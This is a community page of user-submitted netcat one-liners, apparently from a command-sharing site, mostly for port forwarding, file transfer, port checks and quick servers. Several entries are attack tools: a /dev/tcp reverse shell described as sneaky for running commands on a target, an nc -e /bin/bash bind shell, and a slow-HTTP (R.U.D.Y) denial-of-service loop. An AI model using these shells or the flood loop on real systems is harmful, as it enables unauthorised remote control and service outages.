Commands tagged netcat (31)

  • Redirect the local port 2000 to the remote port 3000. The same but UDP: nc -u -l -p 2000 -c "nc -u example.org 3000" It may be used to "convert" TCP client to UDP server (or vice versa): nc -l -p 2000 -c "nc -u example.org 3000"


    25
    nc -l -p 2000 -c "nc example.org 3000"
    prayer · 2009-03-01 21:28:39 2
  • Very simple web server listening on port 80 will serve index.html file or whatever file you like pointing your browser at http://your-IP-address/index.html for example. If your web server is down for maintenance and you'd like to inform your visitors about it, quickly and easily, you just have to put into the index.html file the right HTML code and you are done! Of course you need to be root to run the command using port 80.


    12
    while true ; do nc -l 80 < index.html ; done
    ztank1013 · 2011-08-31 15:17:33 6
  • Command makes use of the Malware Hash Registry (http://www.team-cymru.org/Services/MHR/). It parses the current directory and subdirectories and calculates the md5 hash of the files, then prints the name and sends the hash to the MHR for a lookup in their database. The 3rd value in the result is the detection percentage across a mix of AV packages.


    11
    IFS=$'\n' && for f in `find . -type f -exec md5sum "{}" \;`; do echo $f | sed -r 's/^[^ ]+/Checking:/'; echo $f | cut -f1 -d' ' | netcat hash.cymru.com 43 ; done
    Neo23x0 · 2011-10-15 03:38:47 0
  • Simple one-liner for scanning a range of hosts, you can also scan a range of ports with Netcat by ex.: nc -v -n -z -w 1 192.168.0.1 21-443 Useful when Nmap is not available:) Range declaration like X..X "for i in {21..29}" only works with bash 3.0+


    9
    for i in {21..29}; do nc -v -n -z -w 1 192.168.0.$i 443; done
    rez0r · 2009-09-25 03:31:29 3
  • This is sneaky. First, start a listening service on your box. nc -l 8080 -vvv & On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor. exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done You can send it to the background like this: (exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done) & Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client.


    9
    exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
    somaddict · 2012-11-16 02:48:01 0
  • Uses the extremely cool utilities netcat and expect. "expect" logs in & monitors for server PING checks. When a PING is received it sends the PONG needed to stay connected. IRC commands to try: HELP, TIME, MOTD, JOIN and PRIVMSG The "/" in front of IRC commands is not needed, e.g. type JOIN #mygroup Learn about expect: http://tldp.org/LDP/LGNET/issue48/fisher.html The sample output shows snippets from an actual IRC session. Please click UP button if you like it!


    9
    nik=clf$RANDOM;sr=irc.efnet.org;expect -c "set timeout -1;spawn nc $sr 6666;set send_human {.1 .2 1 .2 1};expect AUTH*\n ;send -h \"user $nik * * :$nik commandlinefu\nnick $nik\n\"; interact -o -re (PING.:)(.*\$) {send \"PONG :\$interact_out(2,string)\"}"
    omap7777 · 2015-03-18 09:10:28 4

  • 8
    nc -l -p 2000 < song.mp3
    prayer · 2009-03-02 15:54:21 1
  • To connect to the shell run: nc server.example.org 2000


    6
    nc -l -p 2000 -e /bin/bash
    prayer · 2009-03-02 15:58:25 3
  • @putnamhill, no need for an if statement in that case. && is an AND and || is an OR


    6
    nc -zw2 www.example.com 80 && echo open
    sputnick · 2009-12-07 21:35:25 3
  • Try to perform a full TCP 3-way handshake for a given host-port with a timeout of 1s.


    6
    nc -zvw 1 host port
    akhilravidas · 2012-07-13 20:02:17 0

  • 5
    lsof -i :22
    bucciarati · 2011-03-11 16:48:37 0
  • For UDP: nmap -sU -p 80 hostname


    4
    nmap -p 80 hostname
    solarislackware · 2009-12-08 20:25:28 0
  • Requires netcat.


    2
    if (nc -zw2 www.example.com 80); then echo open; fi
    putnamhill · 2009-12-07 20:04:55 0

  • 2
    grep current_state= /var/log/nagios/status.dat|sort|uniq -c|sed -e "s/[\t ]*\([0-9]*\).*current_state=\([0-9]*\)/\2:\1/"|tr "\n" " "
    c3w · 2010-03-11 06:04:14 0
  • command | my_irc
    Pipe whatever you want to this function; it will, if everything goes well, be redirected to a channel or a user on an IRC server. Please note that:
    - I am not responsible for flood excesses you might provoke.
    - That function does not reply to PINGs from the server. That's the reason why I first write in a temporary file. Indeed, I don't want to wait for inputs while being connected to the server. However, according to the configuration of the server and the length of your file, you may timeout before finishing.
    - Concerning the server, the variable content must be in the form "irc.server.org 6667" (or any other port). If you want to make some tests, you can also create a fake IRC server on "localhost 55555" by using netcat -l -p 55555
    - Concerning the target, you can choose a channel (beginning with a '#' like "#chan") or a user (like "user").
    - The other variables have obvious names.


    1
    function my_irc { tmp=`mktemp`; cat > $tmp; { echo -e "USER $username x x :$ircname\nNICK $nick\nJOIN $target"; while read line; do echo -e "PRIVMSG $target :$line"; done < $tmp; } | nc $server > /dev/null ; rm $tmp; }
    Josay · 2009-06-11 22:14:48 0
  • Sends commands specified in $commandfile to the telnet server specified by $telnetserver. To have newlines in $commandfile interpreted as ENTER, save the file in CR+LF (aka "Windows-Textfile") format. If you want to save the output in a separate file, use: nc $telnetserver 23 < $commandfile > $resultfile


    1
    nc $telnetserver 23 < $commandfile
    flokra · 2009-08-07 21:32:38 0
  • USAGE: gate listening_port host port Creates a listening socket and connects to a remote device at host:port. It uses pipes for the connection between the two sockets. Traffic which goes through the pipes is written to stdout. I use it for debugging network scripts.


    1
    gate() { mkfifo /tmp/sock1 /tmp/sock2 &> /dev/null && nc -p $1 -l < /tmp/sock1 | tee /tmp/sock2 & PID=$! && nc $2 $3 < /tmp/sock2 | tee /tmp/sock1; kill -KILL $PID; rm -f /tmp/sock1 /tmp/sock2 ; }
    true · 2009-09-25 08:10:23 1
  • On the other machine, write this command: pv -r /dev/zero | nc 192.168.1.1 7777 It will show live throughput between the two machines. The destination machine IP in our example is 192.168.1.1. You must multiply by 8 for the network calculation. You must install the pv and netcat commands to use this command. kerim@bayner.com http://www.bayner.com/


    1
    nc -l -p 7777 > /dev/null
    kerim · 2011-01-24 00:06:45 2
  • Use it to send raw data to a networked device. Used to interact with a relay controller board whose documentation is lost, so use Wireshark to sniff the sent data and replay it using the command.


    1
    echo -n 023135 | perl -pe 's/([0-9a-f]{2})/chr hex $1/gie' | nc -4u -q1 -p5001 192.168.0.100 2000
    sucotronic · 2013-09-18 14:31:47 0
  • Tar's up $DIR locally (w/bzip2) and sends remotely to $HOST:$PORT where netcat listens (using openbsd netcat). Start up receiving side command first, then execute this.


    0
    tar -cjf - $DIR | nc $HOST $PORT
    taintedkernel · 2012-11-13 16:44:26 0
  • Receives bzip'd tar archive via netcat (openbsd nc) and stores locally. Displays size with pv. Start this receiver first, then the sender.


    0
    nc -l $PORT | pv -b > archive.tar.bz2
    taintedkernel · 2012-11-13 16:47:45 0
  • wmr - | pv -s $SIZEOFMEM | ssh -p 40004 -c arcfour,blowfish-cbc -C root@savelocation.com "cat - > /forensics/T430-8gb-RAM1.dd" Run above command from Windows Cygwin: On Windows: Install Cygwin, and copy WMR (windows memory reader 1.0) memory diagnostic into cygwin\bin folder, also install Cygwin's netcat and ssh (openssh). I recommend installing apt-cyg and running " On Linux: Have an SSH Server SIMPLEST FORM: WINDOWS: # wmr - | ssh root@savelocation.com "cat - > /tmp/FileToSave.dd" For more details on how to extract information from memory dump: apt-get install foremost foremost -t all -T -i /forensics/T430-8gb-RAM1.dd For more information: http://www.kossboss.com/memdump-foremost


    0
    wmr - | pv -s $SIZEOFMEM | ssh -p 40004 -c arcfour,blowfish-cbc -C root@savelocation.com "cat - > /forensics/T430-8gb-RAM1.dd"
    bhbmaster · 2013-05-31 00:04:19 0
  • A TCP server that keeps the same socket open, sending the contents of "file" repeatedly.


    0
    while true; do cat "file"; done | nc -v -l 1337
    bknk · 2014-02-06 03:02:58 0
  • If you want to see your top ten CPU-using processes from the browser (e.g. you don't want to ssh into your server all the time for checking system load) you can run this command and browse to the machine's IP on port 8888. For example 192.168.0.100:8888


    0
    while true; do ps aux | sort -rk 3,3 | head -n 11 | cut -c -120 | netcat -l -p 8888 2>&1 >/dev/null; done &
    manumiu · 2014-08-29 07:10:57 0
  • Check if your HTTP server is vulnerable to a very effective variant of slow HTTP attack called R.U.D.Y (R-U-Dead-Yet?). This command tries to keep many connections to the target web server and hold them open as long as possible. Affected server will exhaust its maximum concurrent connection pool and deny additional connection attempts from legitimate clients. Use it with caution!


    0
    for i in `seq 300`; do ( ( echo -e "POST / HTTP/1.1\nHost: vhost.domain\nContent-length: 100000\n\n"; for j in `seq 600`; do echo $j=$j\&; sleep 5; done ) | nc vhost.domain 80 & ); done
    elceef · 2015-04-15 14:02:55 0